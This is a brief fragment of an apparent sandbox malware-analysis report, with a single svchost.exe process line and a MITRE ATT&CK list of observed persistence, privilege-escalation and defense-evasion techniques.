C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:3024
Network
MITRE ATT&CK Enterprise v15
- Persistence
  - Boot or Logon Autostart Execution (1)
    - Registry Run Keys / Startup Folder (1)
  - Create or Modify System Process (1)
    - Windows Service (1)
- Privilege Escalation
  - Boot or Logon Autostart Execution (1)
    - Registry Run Keys / Startup Folder (1)
  - Create or Modify System Process (1)
    - Windows Service (1)
- Defense Evasion
  - Impair Defenses (1)
    - Disable or Modify System Firewall (1)
  - Modify Registry (1)
Downloads